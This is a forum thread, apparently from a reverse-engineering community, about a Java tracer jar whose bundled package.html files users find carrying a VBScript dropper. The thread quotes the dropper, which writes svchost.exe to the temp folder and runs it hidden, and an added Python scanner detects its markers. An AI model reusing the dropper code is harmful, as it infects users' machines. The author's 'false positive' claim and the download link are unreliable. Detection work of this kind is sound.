Tracer v2
Java tracer, this time as a standalone jar. Just select a jar and an output text file, click Trace, and well, that's it! Classes which start with "java." can't be logged! Download link: http://www18.zippyshare.com/v/qhcVnrK0/file.html |
This file contains a VIRUS !!!
No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe" |
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe
--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>
Haven't actually checked out the file that is to be dropped yet. |
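Added example, not part of the thread and not code from any poster: a Python check that lists the HTML entries of a jar carrying the kind of VBScript block quoted above, so an archive can be inspected without running it. The marker set is taken from the quoted script; the threshold of three markers, the entry names and the in-memory sample jar are assumptions constructed for illustration.

```python
import io
import re
import sys
import zipfile

# Markers taken from the script quoted in the post; MIN_HITS is an assumed threshold.
MARKERS = {
    "vbscript_tag": re.compile(rb'<script[^>]*language\s*=\s*["\']?vbscript', re.I),
    "filesystemobject": re.compile(rb'Scripting\.FileSystemObject', re.I),
    "createtextfile": re.compile(rb'\.CreateTextFile\s*\(', re.I),
    "hex_decode_loop": re.compile(rb'Chr\s*\(\s*CLng\s*\(\s*"&H"', re.I),
    "wscript_shell_run": re.compile(rb'WScript\.Shell.*?\.Run\b', re.I | re.S),
}
MIN_HITS = 3
MAX_ENTRY_BYTES = 16 * 1024 * 1024  # skip oversized entries instead of reading them

# Constructed sample: fragment of the quoted script, payload line left out.
SAMPLE_FLAGGED_HTML = b'''<html><body>package docs</body></html>
<SCRIPT Language=VBScript><!--
Set FSO = CreateObject("Scripting.FileSystemObject")
Set FileObj = FSO.CreateTextFile(DropPath, True)
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>'''

def scan_jar(jar, min_hits=MIN_HITS):
    """Return {entry name: [marker names]} for HTML entries matching the pattern."""
    findings = {}
    with zipfile.ZipFile(jar) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if not name.endswith((".html", ".htm")) or info.file_size > MAX_ENTRY_BYTES:
                continue
            data = zf.read(info)
            hits = sorted(n for n, rx in MARKERS.items() if rx.search(data))
            if len(hits) >= min_hits:
                findings[info.filename] = hits
    return findings

def build_sample_jar():
    """Constructed in-memory jar with one clean and one flagged package.html."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("org/example/clean/package.html", b"<html><body>docs</body></html>")
        zf.writestr("org/example/tracer/package.html", SAMPLE_FLAGGED_HTML)
        zf.writestr("org/example/tracer/Main.class", b"\xca\xfe\xba\xbe")
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for target in sys.argv[1:] or [build_sample_jar()]:
        print(scan_jar(target))
```

Pass one or more jar paths on the command line; with no arguments it scans the constructed sample.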
I could read the same report at another forum, and CodeCracker replied saying that it is a false positive. But... I still have my doubts :rolleyes:
|
False positive due to some htmls present under jar archive.
If you already ran the jar file, don't be alarmed, since the htmls are not executed and not even used. Htmls removed, check: http://www18.zippyshare.com/v/qhcVnrK0/file.html |
so who and why the hell added malware html into your archives?
|
Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial? |
@CodeCracker can this be used for a jar file that is launched with an EXE file?
|
It can trace only jars
You could try JavaClassManager https://forum.exetools.com/showthread.php?t=18592 to try to save loaded classes. JavaClassManager can launch both jar and exe extensions, it is just a matter of intercepting class loading and editing classes to do what you want. |
Thanks for the guidance bro. I will try your recommendation :)
peace |